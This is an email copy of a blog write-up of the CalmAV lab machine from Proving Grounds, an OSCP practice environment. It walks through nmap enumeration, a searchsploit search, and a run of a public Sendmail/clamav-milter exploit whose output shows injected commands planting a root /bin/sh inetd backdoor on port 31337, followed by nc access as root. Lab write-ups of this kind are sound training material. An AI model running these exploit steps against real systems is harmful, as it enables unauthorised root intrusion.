[New post] Proving Grounds – CalmAV Write-up

shakuganz posted: " Hi everyone! Today's writeup is one CalmAV from Proving Grounds. It was said to be a retired OSCP machine and it is part of TJNull's OSCP prep list. Let's get started! Nmap enumeration kali@kali:~$ sudo nmap -sC -sV -p- 192.168.70.42 Starting Nmap " Respond to this post by replying above this line New post on Shakugan Proving Grounds – CalmAV Write-up by shakuganz Hi everyone! Today's writeup is one CalmAV from Proving Grounds. It was said to be a retired OSCP machine and it is part of TJNull's OSCP prep list. Let's get started! Nmap enumeration kali@kali:~$ sudo nmap -sC -sV -p- 192.168.70.42 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 22:35 EDT Nmap scan report for 192.168.70.42 Host is up (0.00024s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) | ssh-hostkey: | 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA) |_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA) 25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3 | smtp-commands: localhost.localdomain Hello [192.168.70.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, |_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux)) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.33 (Debian GNU/Linux) |_http-title: Ph33r 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 199/tcp open smux Linux SNMP multiplexer 445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP) 60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) | ssh-hostkey: | 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA) |_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA) MAC Address: 00:50:56:BF:F1:17 (VMware) Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 5h59m58s, deviation: 2h49m42s, median: 3h59m58s |_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.14a-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2021-10-17T02:35:55-04:00 | smb-security-mode: | account_used: guest | authentication_level: share (dangerous) | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Vulnerability found Searchsploit kali@kali:~$ searchsploit sendmail -------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------- --------------------------------- Berkeley Sendmail 5.58 - Debug | linux/remote/19028.txt BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP | multiple/local/19556.sh Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6 | linux/local/19474.txt ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) | multiple/remote/9913.rb Eric Allman Sendmail 8.8.x - Socket Hijack | linux/local/19602.c Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of | linux/dos/19701.sh Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Si | php/webapps/29481.txt Linux Kernel 2.0 Sendmail - Denial of Service | linux/dos/19282.c Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1 | linux/local/20000.c Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1 | linux/local/20001.sh Metainfo Sendmail 2.0/2.5 / MetaIP 3.1 - Upload / | multiple/remote/19084.txt Morris Worm - sendmail Debug Mode Shell Escape (M | unix/remote/45789.rb ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_ | php/webapps/29957.txt PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'ad | php/local/27334.txt PHPMailer < 5.2.19 - Sendmail Argument Injection | multiple/webapps/41688.rb Sendmail 8.11.6 - Address Prescan Memory Corrupti | unix/local/22442.c Sendmail 8.11.x (Linux/i386) - Local Privilege Es | linux/local/411.c Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21060.c Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21061.c Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21062.txt Sendmail 8.11/8.12 Debugger - Arbitrary Code Exec | linux/local/21063.txt Sendmail 8.12.6 - Compromised Source Backdoor | unix/remote/21919.sh Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Comman | linux/remote/24.c Sendmail 8.12.9 - 'Prescan()' Variant Remote Buff | linux/remote/23154.c Sendmail 8.12.x - 'X-header' Remote Heap Buffer O | linux/dos/32995.txt Sendmail 8.12.x - Header Processing Buffer Overfl | unix/remote/22313.c Sendmail 8.12.x - Header Processing Buffer Overfl | unix/remote/22314.c Sendmail 8.12.x - SMRSH Double Pipe Access Valida | unix/local/21884.txt Sendmail 8.13.5 - Remote Signal Handling (PoC) | linux/dos/2051.py Sendmail 8.6.9 IDENT - Remote Command Execution | unix/remote/20599.sh Sendmail 8.9.2 - Headers Prescan Denial of Servic | irix/dos/23167.c Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Lockin | linux/dos/21476.c Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Lockin | linux/dos/21477.c Sendmail with clamav-milter < 0.91.2 - Remote Com | multiple/remote/4761.pl WEBgais 1.0 - websendmail Remote Command Executio | cgi/remote/20483.txt -------------------------------------------------- --------------------------------- Based on the machine name, CalmAV, the exploit found seems interesting. Download and run exploit kali@kali:~$searchsploit -m multiple/remote/4761.pl ... kali@kali:~$perl 4761.pl 192.168.70.42 Sendmail w/ clamav-milter Remote Root Exploit Copyright (C) 2007 Eliteboy Attacking 192.168.77.42... 220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 17 Oct 2021 08:07:59 -0400; (No UCE/UBE) logging access from: [192.168.77.200](FAIL)-[192.168.77.200] 250-localhost.localdomain Hello [192.168.77.200], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-EXPN 250-VERB 250-8BITMIME 250-SIZE 250-DSN 250-ETRN 250-DELIVERBY 250 HELP 250 2.1.0 <>... Sender ok 250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok 250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok 354 Enter mail, end with "." on a line by itself 250 2.0.0 19HC7xE7004017 Message accepted for delivery 221 2.0.0 localhost.localdomain closing connection kali@kali:~$nc 192.168.70.42 31337whoami root pwd / cd /root ls dbootstrap_settings install-report.template proof.txt cat proof.txt a1d***************************** I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. This post is ad-supported ​ shakuganz | October 17, 2021 at 4:33 pm | Tags: CTF | Categories: CTF, Cyber, Security | URL: https://wp.me/p9KTg5-10r Comment    See all comments    Like Unsubscribe to no longer receive posts from Shakugan. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: http://shakuganz.com/2021/10/17/proving-grounds-calmav-write-up/ Thanks for flying with WordPress.com